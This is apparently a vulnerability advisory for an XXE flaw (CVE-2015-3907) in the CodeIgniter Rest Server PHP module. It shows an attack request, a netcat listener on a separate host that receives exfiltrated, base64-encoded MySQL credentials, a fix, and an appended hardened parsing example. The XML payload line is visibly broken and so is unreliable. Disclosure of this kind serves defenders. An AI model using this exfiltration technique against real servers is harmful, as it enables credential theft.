HITCON Knowledge Base

CodeIgniter Rest Server Module XXE (CVE-2015-3907)

Details:

  • Name: Yu-Chi, Ding
  • Email: dingyuchi@gmail.com
  • Software Name: CodeIgniter Rest Server Module
  • Vendor Name: Chris Kacerguis
  • Vendor Website: https://github.com/chriskacerguis
  • Type of vulnerability: XML External Entity (XXE) Processing

Abstract:

CodeIgniter Rest Server is a fully RESTful server implementation for CodeIgniter using one library, one config file and one controller, and it is a popular project on GitHub with 2000 or more stars. CodeIgniter Rest Server is vulnerable to XML External Entity (XXE) attacks; this affects the whole application, not only the examples described below.

Affected:

Vulnerable: https://github.com/chriskacerguis/codeigniter-restserver

Technical Description:

Because all of the XML parsing functionality that PHP offers is built on the libxml libraries, the libxml_disable_entity_loader() function tells the underlying libxml parser not to resolve the entities in the incoming XML and to leave the entity references intact.

When a user POSTs an XML-formatted parameter to CodeIgniter Rest Server, that input is not sanitized before being passed to the simplexml_load_string() function. This can be exploited to carry out XML External Entity (XXE) attacks.

For example:

POST /api/login HTTP/1.1
Host: 172.20.0.9
Accept: application/json
Accept-Language: zh-tw,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/xml; charset=UTF-8

<?xml version="1.0" encoding="UTF-8" ?>     %remote;   %all; ]>   name &send;

eval.xml “>  

Use netcat to listen for TCP connections on port 4444 on 172.20.0.11, then base64-decode the received value to recover the MySQL username and password.

root@172.20.0.11:~# nc -vv -l -p 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from [172.20.0.9] port 4444 [tcp/*] accepted (family 2, sport 13368)
GET /?file=[base64 data removed] HTTP/1.0
Host: 172.20.0.9:4444

Solution:

Add a call to the libxml_disable_entity_loader() function to the constructor in /application/libraries/REST_Controller.php:

public function __construct($config = 'rest')
{
    parent::__construct();
    // disable loading of XML external entities
    libxml_disable_entity_loader(true);
}
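As an added example (not code from the advisory or from the CodeIgniter Rest Server project), a hardened version of the request-body parsing step: it rejects any DOCTYPE up front and disables external entity loading before simplexml_load_string() is called. The function name and the sample bodies are constructed for illustration.

```php
<?php
// Added example, not the project's code: safe handling of an XML request body.
// Two layers: (1) reject any DOCTYPE, since that is the only place an entity
// can be declared and a REST API has no reason to accept a DTD; (2) the
// advisory's fix, disabling external entity loading before parsing.

/**
 * Parse an XML request body safely.
 * Returns a SimpleXMLElement, or null if the body is rejected or malformed.
 */
function parse_xml_body_safely(string $body): ?SimpleXMLElement
{
    // Layer 1: refuse bodies that carry a DTD before the parser sees them.
    if (preg_match('/<!DOCTYPE/i', $body)) {
        return null;
    }

    // Layer 2 (the advisory's fix). libxml_disable_entity_loader() is
    // deprecated as of PHP 8.0, where external entity loading is already off
    // by default, so the call is guarded to keep the code portable.
    if (PHP_VERSION_ID < 80000) {
        libxml_disable_entity_loader(true);
    }

    // LIBXML_NONET forbids network access during parsing. Never pass
    // LIBXML_NOENT here: it would turn entity substitution back on.
    $prev = libxml_use_internal_errors(true);
    $xml = simplexml_load_string($body, 'SimpleXMLElement', LIBXML_NONET);
    libxml_clear_errors();
    libxml_use_internal_errors($prev);

    return $xml === false ? null : $xml;
}

// Constructed sample bodies (the SYSTEM path is a placeholder, never read).
$benign  = '<?xml version="1.0"?><login><user>alice</user></login>';
$withDtd = '<?xml version="1.0"?><!DOCTYPE login [<!ENTITY ext SYSTEM '
         . '"file:///placeholder/not/read">]><login><user>&ext;</user></login>';

$ok = parse_xml_body_safely($benign);
echo $ok !== null ? "benign body parsed, user=" . (string) $ok->user . "\n"
                  : "benign body rejected\n";

$blocked = parse_xml_body_safely($withDtd);
echo $blocked === null ? "body with DOCTYPE rejected\n"
                       : "body with DOCTYPE accepted (unexpected)\n";
```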

Timeline:

2015-05-25: Discovered vulnerability.

2015-06-01: Vendor notification.

2015-06-02: Vendor response.

2015-06-10: Vendor fix.

2015-08-29: Public disclosure.
